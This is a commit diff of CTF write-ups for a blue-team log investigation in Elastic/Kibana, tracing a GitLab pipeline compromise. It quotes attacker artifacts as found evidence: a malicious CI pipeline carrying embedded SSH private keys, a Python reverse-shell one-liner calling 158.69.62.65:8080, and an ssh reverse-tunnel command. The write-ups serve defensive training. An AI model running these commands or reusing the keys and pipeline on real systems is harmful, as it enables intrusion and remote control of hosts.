feat: added 24h@CTF 2023
|
@ -0,0 +1,41 @@
|
|||
# Blue's Clues 1/8: Gitlab Server
|
||||
> You are a blue team analyst working in a Security Operation Center (SOC) for Rezifp, a major pharmaceutical company that may or may not have developped a 91-divoc Vaccine.
|
||||
|
||||
> It's friday morning. You get several Teams messages in quick succession from Martin Mistigri, one of the devops engineer at your firm:
|
||||
|
||||
```
|
||||
Yo blueeeeee whatsssss upppppp 🤜
|
||||
There is some WEIRD stuff going on here no cap 😳
|
||||
so
|
||||
I was vibin, eating my chocolatine, and had some maintenance to do for our CI/CD pipeline on gitlab right
|
||||
well IT TURNS OUT that a new pipeline has appeared out of nowhere??
|
||||
the pipeline is called "Monitoring"
|
||||
it's so sus
|
||||
anyway could u look at it and see if its legit or not
|
||||
```
|
||||
|
||||
> You have been preparing for this moment for your whole carreer. Finally, a real breach??
|
||||
|
||||
> Equiped with your SIEM (Elastic stack), your EDRs (Elastic Defend) and your blue team knowledge, investigate the logs and find what happened.
|
||||
|
||||
> Note: This is a log analysis and investigation challenge. The important sections of the challenge will be the "security" section and the "discover" tab in the "Analytics" section. For reference on how to do searches in elasticsearch using the Kibana Query Language (KQL), refer to this link: https://www.elastic.co/guide/en/kibana/current/kuery-query.html
|
||||
|
||||
> Note: Flags in this track will not have the standard flag format. The flag format is specified in each challenge.
|
||||
|
||||
> Flag1: Find the name of the Gitlab Server.
|
||||
|
||||
## About the Challenge
|
||||
We need to find the Gitlab server name
|
||||
|
||||
## How to Solve?
|
||||
Go to `Analytics` menu and then choose `Discover` menu
|
||||
|
||||
![discover](images/discover.png)
|
||||
|
||||
And then search `agent.name` in `Search` form. Press that to see the name of the Gitlab server
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
Rezifp-Gitlab-Server
|
||||
```
|
After Width: | Height: | Size: 21 KiB |
After Width: | Height: | Size: 94 KiB |
|
@ -0,0 +1,62 @@
|
|||
# Welcome!
|
||||
> Martin the devops engineer sends you a copy of what the weird CI/CD pipeline does:
|
||||
|
||||
```
|
||||
variables:
|
||||
PRIVATE_KEY_GITLAB: |
|
||||
-----BEGIN OPENSSH PRIVATE KEY-----
|
||||
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
|
||||
QyNTUxOQAAACAWFFrVpN4X2AduHjJhV7W5NEBxs0n2fwF3/+ig86EqTAAAAKAoGJ+vKBif
|
||||
rwAAAAtzc2gtZWQyNTUxOQAAACAWFFrVpN4X2AduHjJhV7W5NEBxs0n2fwF3/+ig86EqTA
|
||||
AAAECw7Qmm2do1DNITF0147jS8q99/Re2/9SV4iJlNN2GzKBYUWtWk3hfYB24eMmFXtbk0
|
||||
QHGzSfZ/AXf/6KDzoSpMAAAAHGJhY2t1cHNAUmV6aWZwLUdpdExhYi1TZXJ2ZXIB
|
||||
-----END OPENSSH PRIVATE KEY-----
|
||||
PRIVATE_KEY_FS: |
|
||||
-----BEGIN OPENSSH PRIVATE KEY-----
|
||||
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
|
||||
QyNTUxOQAAACBqwJbg0jEAhyNKSt4i8FStwU8RA7wvvZbTqpCEhQUjtQAAAKAiB9rPIgfa
|
||||
zwAAAAtzc2gtZWQyNTUxOQAAACBqwJbg0jEAhyNKSt4i8FStwU8RA7wvvZbTqpCEhQUjtQ
|
||||
AAAEBVDBKygi9Cq1JJUuCPtXCVcPzVCmO0zWhVrPS9v43ZFWrAluDSMQCHI0pK3iLwVK3B
|
||||
TxEDvC+9ltOqkISFBSO1AAAAF0xpbnV4QWRtaW5ARmlsZVNlcnZlcjAyAQIDBAUG
|
||||
-----END OPENSSH PRIVATE KEY-----
|
||||
PRIVATE_KEY_WEB: |
|
||||
-----BEGIN OPENSSH PRIVATE KEY-----
|
||||
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
|
||||
QyNTUxOQAAACBxALoFgiT34kOecbp7apS5zLKmVIWDtF9XJH0wTJIUywAAAKhGbRnhRm0Z
|
||||
4QAAAAtzc2gtZWQyNTUxOQAAACBxALoFgiT34kOecbp7apS5zLKmVIWDtF9XJH0wTJIUyw
|
||||
AAAEBwHzDMUnHlEuTOM0xAfoTAQzbBb2B2S3ubo5MqII/6SnEAugWCJPfiQ55xuntqlLnM
|
||||
sqZUhYO0X1ckfTBMkhTLAAAAIFJlemlmcEFkbWluQFJlemlmcC1HaXRMYWItU2VydmVyAQ
|
||||
IDBAU=
|
||||
-----END OPENSSH PRIVATE KEY-----
|
||||
|
||||
stages:
|
||||
- deploy
|
||||
|
||||
deploy-job:
|
||||
stage: deploy
|
||||
environment: production
|
||||
script:
|
||||
- chmod u+x ./health-agent
|
||||
- nohup ./health-agent &
|
||||
# - eval "$(ssh-agent -s)"
|
||||
# - echo "${PRIVATE_KEY_WEB}"
|
||||
# - echo -n "${PRIVATE_KEY_WEB}" | ssh-add -
|
||||
# - rsync -zPe "ssh -o StrictHostKeyChecking=no" ./ Webmestre@10.0.0.5:/tmp/
|
||||
# - ssh -Nf -o "StrictHostKeyChecking=no" Webmestre@10.0.0.5 'chmod u+x /tmp/health-agent; nohup ./health-agent &'
|
||||
tags:
|
||||
- shell
|
||||
```
|
||||
|
||||
> This is clearly malicious. Before going further, we need to go back. How did this pipeline get there? Find the username that created the rogue CI/CD pipeline.
|
||||
|
||||
## About the Challenge
|
||||
We need to find the username that created the malicious CI/CD pipeline
|
||||
|
||||
## How to Solve?
|
||||
In the KQL syntax, I inputted `health-agent` because I want to see some logs that contains string `health-agent` and contain the username. I checked one of the logs and we found the username that created the malicious CI/CD pipeline
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
yvandescreds
|
||||
```
|
After Width: | Height: | Size: 189 KiB |
|
@ -0,0 +1,24 @@
|
|||
# Blue's Clues 3/8: Source IP
|
||||
> Martin has no idea who this user is, it's not a Rezifp employee and it has admin privileges. From which IP was this user created, by which user, using which user agent, and using which type of gitlab token?
|
||||
|
||||
> Flag format: <creator_username>|<source_ip>|<user_agent>|<gitlab_token_type>
|
||||
|
||||
> Not case sensitive.
|
||||
|
||||
> Example: myaccount|127.0.0.1|someuseragent|SomeTokenType
|
||||
|
||||
## About the Challenge
|
||||
We need to find the some information for example, username, source ip, etc that created `yvandescreds` account
|
||||
|
||||
## How to Solve?
|
||||
First, I searched the username in the KQL syntax and then I want to find the log that contains string `username`. And if we check the result of `gitlab.username` search field, the result is `mimine1965` created that user
|
||||
|
||||
![username](images/username.png)
|
||||
|
||||
After that, I changed the KQL syntax like the image below because I want to find the log when `mimine1965` created `yvandescreds`. Choose the oldest logs and you will obtain some information
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
mimine1965|10.0.0.5|curl/8.0.1|PersonalAccessToken
|
||||
```
|
After Width: | Height: | Size: 240 KiB |
After Width: | Height: | Size: 105 KiB |
|
@ -0,0 +1,18 @@
|
|||
# Blue's Clues 4/8: Source Machine
|
||||
> What? It's an internal IP? What is the hostname of this IP?
|
||||
|
||||
> Flag format: <hostname>
|
||||
|
||||
> Not case sensitive.
|
||||
|
||||
## About the Challenge
|
||||
We need to find the hostname of the IP (10.0.0.5)
|
||||
|
||||
## How to Solve?
|
||||
I searched about `10.0.0.5` in KQL syntax form and then if we check the result of `host.hostname`. The hostname is WebServer01
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
WebServer01
|
||||
```
|
After Width: | Height: | Size: 81 KiB |
|
@ -0,0 +1,26 @@
|
|||
# Welcome!
|
||||
> The web server?? How did the threat actor get access to the web server? Surely we have logs for that... It hosts a simple PHP website, nothing complex.
|
||||
|
||||
> Find the malicious file.
|
||||
|
||||
> Flag format: <filename>.<fileextension>
|
||||
|
||||
> Example: mywebshell.aspx
|
||||
|
||||
## About the Challenge
|
||||
We need to find the name of the webshell
|
||||
|
||||
## How to Solve?
|
||||
Im using this KQL syntax because I want to find the URL that using `PHP` extension and the HTTP response code returned `200 OK`
|
||||
|
||||
```
|
||||
url.extension : php and http.response.status_code : 200
|
||||
```
|
||||
|
||||
And then I searched the log one by one until I found this weird PHP file
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
ce52790629679d930ca16c39a4f619c3.php
|
||||
```
|
After Width: | Height: | Size: 202 KiB |
|
@ -0,0 +1,22 @@
|
|||
# Blue's Clues 6/8: Discovery
|
||||
> Is that... a webshell?
|
||||
|
||||
> We can see the commands that were executed by the attacker. However, we don't see any command hinting at the creation of the rogue user in gitlab. There must be an intermediary step.
|
||||
|
||||
> What is the last command executed by the webshell?
|
||||
|
||||
> Flag format: <decoded_command> Not case sensitive, but keep special chars.
|
||||
|
||||
> Example: ls -latr
|
||||
|
||||
## About the Challenge
|
||||
We need to find the last command executed by webshell
|
||||
|
||||
## How to Solve?
|
||||
By using the same KQL syntax, I searched the logs one by one and check when the attacker stop accessing the webshell. And we found the last command was reverse shell command
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("158.69.62.65",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
||||
```
|
After Width: | Height: | Size: 216 KiB |
|
@ -0,0 +1,26 @@
|
|||
# Welcome!
|
||||
> Okay. Let's recap. The web server somehow got exploited, and a webshell was uploaded. The webshell allowed for commands to be executed. A reverse-shell was launched. A gitlab user was created. The gitlab user created a malicious pipeline.
|
||||
|
||||
> Using this search in analytics>discover: host.hostname :"Rezifp-GitLab-Server" and gitlab.meta.remote_ip:10.0.0.5 and gitlab.ua:* And going into the "field statistics" tab, we can see that there are two user agents: curl and firefox, that made queries to our gitlab from the web server. However, firefox is not installed on the web server. There must be a tunnel/socks proxy that was created. Find the command line that created that tunnel.
|
||||
|
||||
> Flag format: <commandline>
|
||||
|
||||
> Example: ./tunnelcreator create tunnel --awesome
|
||||
|
||||
## About the Challenge
|
||||
We need to find the command that created the tunnel/socks proxy
|
||||
|
||||
## How to Solve?
|
||||
Im using this KQL syntax because I want to find the command that related to SSH and the `-R` option is used to set up a reverse port forwarding, also known as remote port forwarding. It allows connections from the remote SSH server to be forwarded to a local machine or a different machine on the client's network.
|
||||
|
||||
```
|
||||
"ssh" and "-R"
|
||||
```
|
||||
|
||||
And then find `proccess.command_line` in the `Search Field` form
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
ssh -i /tmp/key -r 8080 rezifp-admin@158.69.62.65
|
||||
```
|
After Width: | Height: | Size: 118 KiB |
|
@ -0,0 +1,26 @@
|
|||
# Blue's Clues 8/8: C2
|
||||
> The pipeline executes on the gitlab server itself. It must be some kind of persistence. Find the C2.
|
||||
|
||||
> Flag Format: <domain_name>
|
||||
|
||||
> Lowercase.
|
||||
|
||||
> Example: a.b.google.com
|
||||
|
||||
## About the Challenge
|
||||
We need to find the C2 domain name
|
||||
|
||||
## How to Solve?
|
||||
Without using any KQL syntax, check the `url.path` result
|
||||
|
||||
![url_path](images/url_path.png)
|
||||
|
||||
You will notice there is a very long URL path called `obr7CrUaaoy5LL8u3RqT6gLBTkdO5pzAqUs4JMcqsFRWulE8tgQA7EqqRD_Gx0MgO6HSwMlj5TleRRXMwcblsFn2o2enyUpuCsEf-d8ExZjl1eI2T4Mm0V`. Press the plus button to add the URL path into KQL syntax
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
Now check the `url.full` result to obtain the C2 server name
|
||||
|
||||
```
|
||||
rezfiphealthcheck-f9fsh8dqbjfwasf7.z01.azurefd.net
|
||||
```
|
After Width: | Height: | Size: 145 KiB |
After Width: | Height: | Size: 113 KiB |
|
@ -0,0 +1,14 @@
|
|||
# Preparation - Adipol Lipidex 32mg
|
||||
> You have been tasked to investigate the company that created the horrible Adipol Lipidex 32mg. Please open the attached file. When you do so you will receive further instructions.
|
||||
|
||||
## About the Challenge
|
||||
We need to open the file to obtain the flag (You can download the file [here](Adipol_Lipidex_32_mg.ad1))
|
||||
|
||||
## How to Solve?
|
||||
Open the file using FTK Imager and read `ReadMe.txt` file to obtain the flag
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
FLAG{y0u_sucCesfully_0p3n3d_M3_}
|
||||
```
|
After Width: | Height: | Size: 26 KiB |
|
@ -0,0 +1,15 @@
|
|||
# 24h@CTF 2023
|
||||
CTF writeup for The 24h@CTF 2023. I took part in this CTF competition (Solo), and got 15th place out of 170 users
|
||||
|
||||
| Category | Challenge |
|
||||
| --- | --- |
|
||||
| Desjardins - Blue Team | [Blue's Clues 1/8: Gitlab Server](/24h%40CTF%202023/Blue's%20Clues%201%20Gitlab%20Server/)
|
||||
| Desjardins - Blue Team | [Blue's Clues 2/8: Source User](/24h%40CTF%202023/Blue's%20Clues%202%20Source%20User/)
|
||||
| Desjardins - Blue Team | [Blue's Clues 3/8: Source IP](/24h%40CTF%202023/Blue's%20Clues%203%20Source%20IP/)
|
||||
| Desjardins - Blue Team | [Blue's Clues 4/8: Source Machine](/24h%40CTF%202023/Blue's%20Clues%204%20Source%20Machine/)
|
||||
| Desjardins - Blue Team | [Blue's Clues 5/8: Initial Access](/24h%40CTF%202023/Blue's%20Clues%205%20Initial%20Access/)
|
||||
| Desjardins - Blue Team | [Blue's Clues 6/8: Discovery](/24h%40CTF%202023/Blue's%20Clues%206%20Discovery/)
|
||||
| Desjardins - Blue Team | [Blue's Clues 7/8: Tunnel](/24h%40CTF%202023/Blue's%20Clues%207%20Tunnel/)
|
||||
| Desjardins - Blue Team | [Blue's Clues 8/8: C2](/24h%40CTF%202023/Blue's%20Clues%208%20C2/)
|
||||
| Forensics | [Preparation - Adipol Lipidex 32mg](/24h%40CTF%202023/Preparation%20-%20Adipol%20Lipidex%2032mg/)
|
||||
| Trivia | [The Cuckoo's Egg](/24h%40CTF%202023/The%20Cuckoo's%20Egg/)
|
|
@ -0,0 +1,14 @@
|
|||
# The Cuckoo's Egg
|
||||
> When Clifford Stoll contacted the FBI for the first time regarding a potential intrusion in his systems, how much money did he say he lost (answer in dollars)?
|
||||
|
||||
> Flag format: \d+\.\d{2}
|
||||
|
||||
## About the Challenge
|
||||
We need to find the total money
|
||||
|
||||
## How to Solve?
|
||||
Im using ChatGPT to answer this question and the answer is `0.75$`
|
||||
|
||||
```
|
||||
0.75
|
||||
```
|